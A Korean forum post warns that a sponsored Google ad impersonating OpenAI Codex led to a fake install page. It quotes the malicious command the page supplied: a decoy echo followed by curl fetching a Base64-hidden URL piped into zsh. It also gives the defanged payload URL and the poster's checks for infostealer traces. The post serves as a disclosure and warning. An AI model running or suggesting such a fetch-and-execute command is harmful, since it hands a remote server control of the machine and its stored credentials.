경고: OpenAI Codex를 사칭한 구글 스폰서 광고가 악성코드 유포 중
Warning: Sponsored Google result for OpenAI Codex led me to a malicious stealer
핵심 요약
구글 스폰서 광고를 통해 OpenAI Codex를 사칭한 악성코드 배포 사례가 발견되어 사용자 주의가 요구됩니다.
- 악성 광고 주의 — 구글 검색 상단 스폰서 광고가 악성 설치 페이지로 연결됨
- 공격 방식 — Base64로 난독화된 명령어를 통해 원격 서버의 스크립트를 터미널에서 직접 실행
- 보안 위협 — 정보 탈취형 악성코드로 의심되며 브라우저 데이터 및 키체인 접근 가능성 존재
- 예방 조치 — 터미널에 명령어를 복사하기 전 반드시 공식 소스인지 확인하고 광고 차단기 사용 권장
OpenAI Codex 사칭하는 놈들이 있어서 여기다 글 쓴다. Codex 검색하는 사람들 낚이기 딱 좋겠더라.
오늘 구글에 OpenAI Codex를 검색해 봤거든. 근데 첫 번째 결과가 광고더라고. 구글 URL처럼 보이길래 눌렀더니 Google Pages로 호스팅된 페이지로 연결되면서 가짜 Codex 설치 방법을 알려주고 있었음.
시키는 대로 따라 하다가 이런 명령어를 실행하게 됐음:
echo "npm install -g u/openai/codex https://openai.com/codex/" &&
curl -s $(echo "<base64 encoded URL>" | openssl base64 -d -A) | zsh
echo 부분은 그냥 그럴싸해 보이는 OpenAI/npm 관련 텍스트만 출력하는 거였음. 실제 페이로드 URL은 Base64로 숨겨져 있었고, 디코딩해보니 이거였음:
hxxps://quill-flint[.]com/curl/2h0w4vtm7c/7b4cckfhojxjbrcjon.json
결국 저 명령어는 정체불명의 서버에서 뭘 받아와서 zsh에서 바로 실행해버린 거임.
실행하고 나서 바로 뭔가 잘못됐다는 걸 깨닫고 맥부터 뒤져봤다.
지금까지 확인한 건 이래:
- 알 수 없는 LaunchAgents나 LaunchDaemons 없음
.zshrc,.bash_profile, fish 설정 파일에 수상한 수정 사항 없음/tmp,/private/tmp,~/.local등등에 눈에 띄는 페이로드 없음- 최근 macOS 스틸러 캠페인에서 발견되는 흔적 없음
- 수상한 상주 프로세스 없음
내 원래 Codex 설치본은 정상이고 저거랑은 상관없다는 것도 확인했음. 악성 명령어 실행하기 전에 이미 Homebrew로 설치해둔 상태였고, 바이너리 서명도 정상임:
Developer ID Application: OpenAI OpCo, LLC (2DC432GLL2)
지금 제일 걱정되는 건, 저 악성 스크립트가 크롬 비밀번호/쿠키, 키체인 데이터, SSH 키, API 토큰 같은 거 싹 긁어가서 서버로 전송하고 흔적도 없이 사라진 **일회성 정보 탈취(infostealer)**였을 가능성임.
혹시 이 가짜 Codex 캠페인 본 사람 또 있냐?
OpenAI가 구글 검색 광고나 Google Pages가 Codex 설치 페이지 사칭하는 데 악용되고 있다는 걸 이미 알고 있는지 궁금하다.
Codex 설치하려는 애들은 터미널에 뭐 복사해서 넣기 전에 공식 OpenAI 소스 맞는지 꼭 확인해라. 명령어 앞에 그럴싸한 echo 붙어있다고 안심하지 마라. 뒤에 파이프(|)로 원격 서버 내용 바로 쉘로 꽂아버리면 아무 의미 없으니까.

